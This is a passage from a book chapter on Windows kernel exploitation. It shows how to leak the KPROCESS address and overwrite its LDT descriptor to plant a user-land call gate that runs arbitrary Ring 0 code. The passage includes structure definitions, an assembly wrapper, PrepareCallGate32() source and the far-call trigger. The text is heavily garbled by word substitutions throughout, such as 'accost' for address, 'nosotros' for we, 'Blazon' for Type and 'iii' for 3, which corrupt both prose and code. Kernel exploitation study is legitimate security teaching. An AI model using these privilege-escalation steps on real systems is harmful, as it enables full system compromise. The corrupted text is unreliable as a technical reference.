Windows has a lot of undocumented system calls that do prissy things. We have met one of them before, while looking for a way to enumerate device drivers' base of operations addresses: ZwQuerySystemInformation(). This function can also exist used to enumerate the kernel accost of the KPROCESS structure of the current running procedure. The function that implements the KPROCESS search is named FindCurrentEPROCESS(). The full code, as usual, can be institute on this volume'southward companion Spider web site, www.attackingthecore.com.

This office first opens a new file handle to the current process object using the OpenProcess() API. After having opened a valid handle it invokes the ZwQuerySystemInformation() API using SystemHandleInformation as a SYSTEM_INFORMATION_CLASS parameter. This function retrieves all the open handles in the system. Every entry is composed of a SYSTEM_HANDLE_INFORMATION_ENTRY whose layout is shown below:

typedef struct _SYSTEM_HANDLE_INFORMATION_ENTRY

{

  ULONG ProcessId;

  BYTE ObjectTypeNumber;

  BYTE Flags;

  Curt Handle;

  PVOID Object;

  ULONG GrantedAccess;

} SYSTEM_HANDLE_INFORMATION_ENTRY,

  *PSYSTEM_HANDLE_INFORMATION_ENTRY;

The Object field holds the linear address of the dynamically allocated kernel object related to the given handle that is stored in the Handle field. The function looks for an entry that has the ProcessId field equal to the current process ID and the Handle field equal to the merely-opened process handle. The final Object field of the located entry is thus the KPROCESS structure accost of the current procedure.

Note

Since the KPROCESS is the kickoff embedded field within the EPROCESS structure, the accost of the KPROCESS structure is always equal to the accost of the EPROCESS structure also.

From this point onward we can overwrite an arbitrary element of the KPROCESS (and thus too the EPROCESS) structure. Let's have a look at a few interesting fields nosotros can overwrite within the KPROCESS structure:

0: kd> dt nt!_kprocess 859b6ce0

  +0x000 Header   : _DISPATCHER_HEADER

  +0x010 ProfileListHead   : _LIST_ENTRY

  +0x018 DirectoryTableBase : [ii] 0x3fafe3c0

  +0x020 LdtDescriptor   : _KGDTENTRY

  +0x028 Int21Descriptor   : _KIDTENTRY

  +0x030 IopmOffset   : 0x20ac

  +0x032 Iopl   : 0 ''

[ … ]

At the showtime of the KPROCESS construction there are a couple of very interesting entries: a KGDTENTRY structure (LdtDescriptor) and a KIDTENTRY (Int21Descriptor). The onetime structure represents the local process LDT segment descriptor entry. This special arrangement segment entry is stored inside the global descriptor table (GDT) during every context switch and describes the location and size of the current local descriptor table (LDT) in memory. The latter entry represents the 21th interrupt descriptor table (IDT) entry used mainly by the virtual DOS auto (NTVDM.exe) to emulate vm86 (virtual 8086 style) processes. This entry is needed to emulate the original INT 21h software interrupt. This interrupt was used as an entry point to emulate sometime DOS system service routines. Overwriting the former GDT entry (through the saved LDT segment descriptor) we can remap the whole LDT into user-country memory. Subsequently having gained total admission to the LDT nosotros can but build upwards an inter-privileged call gate to run Ring 0 lawmaking. Similarly, overwriting the 21h IDT entry we can build a new trap gate that will fulfill the aforementioned result: running arbitrary code at Ring 0.

Next, nosotros volition briefly show how to exploit the former vector to build an arbitrary call gate, remapping the whole LDT into the user-land retentivity. A telephone call gate is a gate descriptor that can be stored within the LDT or the GDT. It provides a manner to spring to a different segment located at a different privilege.

The main function implementing this exploitation vector is called LDTDescOverwrite(). Every bit usual, the highly-commented total code is available inside the DVWDExploits package. First, it creates and initializes a new LDT using the undocumented ZwSetInformationProcess() API that has the post-obit prototype:

typedef enum _PROCESS_INFORMATION_CLASS

{

  ProcessLdtInformation = 10

} PROCESS_INFORMATION_CLASS;

NTSTATUS __stdcall

  ZwSetInformationProcess

  (HANDLE ProcessHandle,

  PROCESS_INFORMATION_CLASS ProcessInformationClass,

  PPROCESS_LDT_INFORMATION ProcessInformation,

  ULONG ProcessInformationLength);

The first parameter has to be a valid process handle (acquired via OpenProcess() API). The 2d parameter is the process information class type: ProcessLdtInformation. The tertiary parameter holds the pointer to a PROCESS_LDT_INFORMATION construction and the 4th parameter is the size of the aforementioned structure. The PROCESS_LDT_INFORMATION has the following structure:

typedef struct _PROCESS_LDT_INFORMATION

{

  ULONG Start;

  ULONG Length;

  LDT_ENTRY LdtEntries[…];

}   PROCESS_LDT_INFORMATION, *PPROCESS_LDT_INFORMATION;

The Start field indexes the first available descriptor within the LDT. The LdtEntries array holds an arbitrary number of LDT_ENTRY structures, and the Length is the size of the LdtEntries assortment. An LDT_ENTRY may identify a system segment (task-gate segment), a segment descriptor (data or lawmaking segment descriptor) or a call/task gate. Every LDT entry is 8-bytes wide on 32-bit architectures and sixteen-bytes wide on x64 architectures.

Note

It is important not to muddle between an LDT segment descriptor (a special arrangement segment that can be stored only within the GDT and that identifies the location of the LDT) from all the other segments/gates that can be stored both on GDT or LDT (simply trap/interrupt gate that tin can be stored only on the IDT).

Of grade, as we can imagine, the ZwSetInformationProcess() API lets us create a subset of all possible code and information segments, denying every try to create a organization segment or gate descriptor. After invoking this call the kernel allocates space for the LDT, initializes the LDT entries and installs the LDT segment descriptor into the electric current processor GDT. Moreover, since every procedure can take its own LDT the kernel saves the LDT segment descriptor into the KPROCESS kernel structure LdtDescriptor, equally described to a higher place. After a process context switch the kernel checks if the new process has a unlike active LDT segment descriptor and installs information technology in the electric current processor GDT before passing command back to the process. What we demand to do can be summarized in the following steps:

Build an assembly wrapper to the payload to be able to render from the call gate (using a FAR RET).

This step can exist accomplished by writing a pocket-size assembly stub that saves the bodily context, sets the correct kernel segment selector, invokes the actual payload, and returns to the caller restoring the previous context and issuing a far render. The following is an example of code performing information technology on 32-bit architecture:

0: kd> u 00407090 L9

00407090 60   pushad

00407091 0fa0   push   fs

00407093 66b83000   mov   ax,30h

00407097 8ee0   mov   fs,ax

00407099 b841414141   mov   eax,CShellcode

0040709e ffd0   call   eax

004070a0 0fa1   pop   fs

004070a2 61   popad

004070a3 cb   retf

The lawmaking saves all the general purpose registers and the FS segment annals. Adjacent, it loads the new FS segment addressing the current KPCR (Kernel Processor Control Region) and invokes the kernel payload. At the terminate, before exiting, the code restores the FS segment selector and general-purpose registers and executes a far render to switch-back in user land.

Build a simulated user-land LDT within a page-aligned address.

This pace is straightforward. We just have to map an bearding writable page-aligned area in retention using the CreateFileMapping()/MapViewOfFile() API pair.

Fill the fake user-land LDT with a single call gate (entry 0) with the following characteristics:

The DPL must be iii (accessible from user space)

The code segment selector must be the kernel code segment

The offset must be the address of our user-state payload

This pace is moved forward by the PrepareCallGate32() part that is shown next:

VOID PrepareCallGate32(PCALL_GATE32 pGate, PVOID Payload)

{

  ULONG_PTR IPayload = (ULONG_PTR)Payload;

  RtlZeroMemory(pGate, sizeof(CALL_GATE32));

  pGate->Fields.OffsetHigh = (IPayload & 0xFFFF0000) >> 16;

  pGate->Fields.OffsetLow = (IPayload & 0x0000FFFF);

  pGate->Fields.Blazon = 12;

  pGate->Fields.Param = 0;

  pGate->Fields.Present = 1;

  pGate->Fields.SegmentSelector = 1 << 3;

  pGate->Fields.Dpl = iii;

}

The code takes two parameters: the pointer to the call gate descriptor (in our case the first LDT_ENTRY of the imitation user-land LDT) and a pointer to the payload. The blazon field identifies the type of segment. Of course the value "12" indicates a call gate descriptor. The Param field of the gate descriptor indicates the number of parameters that have to be copied to the callee stack while invoking the gate. Nosotros take to take this value into account since nosotros need to restore the stack properly during the execution of the far return.

Locate the LDT descriptor, adding the correct offset to the address of the KPROCESS structure previously leaked by the FindCurrentEPROCESS() function.

Trigger the vulnerability to overwrite the LDT descriptor stored within the KPROCESS structure.

The LdtDescriptor field of the KPROCESS structure is located 0x20 bytes forward of the start of the structure. Nosotros demand to overwrite the address (outset) within the descriptor that locates the LDT in memory. Similar to what we have washed with the previous vector, nosotros can overwrite the whole descriptor or just the MSB. If we overwrite just the MSB nosotros also take to create a lot of fake-LDTs all over the target 16MB at the kickoff of every in-range page (equally much as we created the NOP sled before).

Forcefulness a procedure context switch.

Since the LDT segment descriptor is updated but afterwards a context switch nosotros need to put the process to slumber or reschedule it before attempting to apply the gate. It is enough to phone call an API that puts the process to sleep like SleepEx(). At the next reschedule the kernel will fix upward the modified version of the LDT segment descriptor remapping the LDT in user land.

Trigger the call gate via a FAR CALL.

To pace into the call gate nosotros demand to execute a FAR Telephone call instruction. Again we tin can write a small assembly stub to exercise the chore. The adjacent snippet shows the lawmaking within the FarCall() part that performs the FAR CALL.

0: kd> u TestJump

[ … ]

004023be 9a000000000700 call 0007:00000000

[ … ]

Equally we can see, the code executes a CALL explicitly specifying a segment selector (0x07) and an kickoff (0x00000000) that is ignored during the phone call gate phone call but is mandatory for the associates instruction format. Every bit we take seen in Chapter iii, a segment selector is built up by iii elements. The beginning less-meaning scrap is the requested privilege level (RPL), the second less significant bit is the table indicator (TI) flag and the remainder is the index of the descriptor inside the GDT/LDT. In this instance the segment selector has an RPL equal to three, a TI flag equal to one and the descriptor index equal to zero. Every bit expected this means that the selector is addressing the LDT (TI=1) and that we are interested in the already-set-upward LDT_ENTRY (the outset one) that has an alphabetize value equal to zero.

Read full chapter

URL:

https://www.sciencedirect.com/science/article/pii/B9781597494861000061